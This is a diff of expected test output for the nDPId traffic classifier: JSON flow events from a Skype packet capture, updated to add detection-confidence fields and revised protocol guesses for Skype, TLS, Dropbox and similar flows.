-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00612{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643972,"flow_last_seen":1431969670410,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969713814,"flow_last_seen":1431969726846,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969668503,"flow_last_seen":1431969788519,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1431969728749,"flow_last_seen":1431969734854,"flow_idle_time":180000,"flow_min_l4_payload_len":433,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":6693,"flow_avg_l4_payload_len":478,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969668503,"flow_last_seen":1431969788519,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1431969728749,"flow_last_seen":1431969734854,"flow_idle_time":180000,"flow_min_l4_payload_len":433,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":6693,"flow_avg_l4_payload_len":478,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969643093,"flow_last_seen":1431969698671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","ndpi": {"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1431969793871,"flow_last_seen":1431969802019,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
